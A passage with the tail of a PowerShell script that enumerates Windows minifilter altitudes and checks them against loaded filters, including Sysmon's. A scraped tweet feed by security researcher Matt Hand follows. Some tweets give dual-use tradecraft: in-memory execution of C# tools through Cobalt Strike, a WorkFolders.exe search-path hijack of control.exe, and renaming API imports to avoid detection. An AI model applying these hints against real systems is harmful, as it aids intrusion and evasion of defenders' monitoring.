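                Altitude  = [string]$p.Altitude
                Group     = $svcProps.Group              # e.g. "FSFilter Activity Monitor"
                ImagePath = $svcProps.ImagePath
            }
        }
    }
}

function Get-LoadedFilter {
    # fltmc prints "Filter Name  Num Instances  Altitude  Frame"; only data rows match this pattern.
    & fltmc.exe filters 2>$null | ForEach-Object {
        if ($_ -match '^(\S+)\s+(\d+)\s+([\d.]+)\s+(\S+)') {
            [pscustomobject]@{ Filter = $Matches[1]; Instances = [int]$Matches[2]; Altitude = $Matches[3]; Frame = $Matches[4] }
        }
    }
}

# Altitudes worth a second look. 385201 is Sysmon's registered altitude (from the tweet above);
# registration with Microsoft is not enforced, so a driver can also be moved to a free altitude.
$watch  = @{ '385201' = 'Sysmon (registered altitude)' }
$loaded = @{}
Get-LoadedFilter | ForEach-Object { $loaded[$_.Altitude] = $_.Filter }

Get-MinifilterAltitude | ForEach-Object {
    $_ | Add-Member -NotePropertyName Loaded -NotePropertyValue ($loaded.ContainsKey($_.Altitude)) -PassThru |
         Add-Member -NotePropertyName Note   -NotePropertyValue ($watch[$_.Altitude]) -PassThru
} | Sort-Object { [double]$_.Altitude } -Descending | Format-Table -AutoSize
```

A registered-but-not-loaded row is as interesting as a loaded one: it is what a detached or renamed Sysmon looks like from the registry side.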
@matterpreter
Matt Hand
4 years
Features: - x86 & x64 support - Recursive import search (dependency walker) - No external requirements (no PeNet!) - Written entirely in C# for easy deployment via C2
@matterpreter
Matt Hand
5 years
My intent with the post is to put out documentation for Mimidrv, but also show some of the specifics of why operating in the kernel is so powerful and demonstrate the practical application through existing tooling. 2/3
@matterpreter
Matt Hand
4 years
There are tons of other applications for binary analysis due to how powerful Neo4j's pathfinding capabilities are. Huge thank you to @xpn for the inspiration, @cptjesus for helping with Cypher, and @markus_pieton for helping shift my approach to collection ❤️
@matterpreter
Matt Hand
9 months
I'll pose another question: To the pentesters/red teamers/developers who voted for "no alert" or "no telemetry", how are you evaluating that? Are you using some EDR analog (ex. procmon) for telemetry identification? How are you determining if an alert was fired?
@matterpreter
Matt Hand
4 years
@GironSec @harmj0y I'd be happy to accept your PR 🙂
@matterpreter
Matt Hand
3 years
@h0mbre_ @subat0mik I've worked in both types of shops and have noticed that, for me, having ownership of the process and the outputs leads to more motivation to work on side projects. When I worked at places that controlled the outputs, I felt a sense of "why bother" since they'd either be sold 1/2
@matterpreter
Matt Hand
3 years
@h0mbre_ @subat0mik go uncredited, or filled with marketing cruft that would water it down. I think it may be warranted in some ultra-specific cases, but overall I think employers who attempt to control their employees' personal projects/publications are making the wrong call. 2/2
@matterpreter
Matt Hand
3 years
The first place this API looks for the target executable is the current working directory. 2/
@matterpreter
Matt Hand
9 years
Awesome week of class. Thanks @Steph3nSims @jimshew @SANSInstitute Highly recommend #SEC660 if you haven't taken it.
@matterpreter
Matt Hand
3 years
When WorkFolders.exe is called with no parameters, it launches control.exe from whatever location in its search path (malicious or not) with the arguments "/name Microsoft.Workfolders" 3/3
@matterpreter
Matt Hand
4 years
@byt3bl33d3r It's also worth noting that these are just the minifilters and not the primary kernel drivers used by EDRs.
@matterpreter
Matt Hand
3 years
@rshift I hope the post helps! I'm always around to talk kernel stuff if you have questions.
@matterpreter
Matt Hand
6 years
Also wanted to thank @CE2Wells , @mattifestation , @bohops , @arvanaghi , @harmj0y , and @cobbr_io for answering my questions, helping me test, and putting out great examples of C# tradecraft that I referenced heavily on these.
@matterpreter
Matt Hand
3 years
If you find this stuff interesting, you might enjoy our Vulnerability Research course. Our next (remote) public offering is March 3-4, 2022.
@matterpreter
Matt Hand
6 years
@Cyb3rWard0g @FuzzySec @harmj0y @THE_HELK @Cyb3rPandaH @1ns0mn1h4ck Starting playing with it a bit last night and there's tons of potential there. Excited to see what you come up with!
@matterpreter
Matt Hand
1 year
@FabrePierrejean @nostarch The planned release date is October 31 of this year. Each chapter of the book dives deep into the internals of how a sensor works before covering anything about evasion.
@matterpreter
Matt Hand
4 years
@_SledGoes0x90 You commonly would compile the project and then feed it to your C2 that supports in-memory execution of .NET assemblies (e.g. Cobalt Strike's execute-assembly). If you're interested in how that works, @domchell wrote a great post on it a few months ago.
@matterpreter
Matt Hand
3 years
In testing, I'm able to work through every DLL/EXE/SYS in System32 in ~7 seconds.
@matterpreter
Matt Hand
3 years
@HackingLZ Yep, 10000%. There's value in both approaches based on what the client is trying to get out of the engagement. Attack surface/path identification? You absolutely have to test externally. Detection and response improvements? Then we should talk about assumed breach as an option.
@matterpreter
Matt Hand
3 years
I'm incredibly proud to put out our team's approach to addressing this problem today and look forward to hearing you all's thoughts. 2/2
@matterpreter
Matt Hand
5 years
@ionstorm @FuzzySec Great work! Just bear in mind that those method/struct names are modifiable by setting the EntryPoint in DllImport to the true name and renaming the function or changing the struct name in Win32.cs to something random.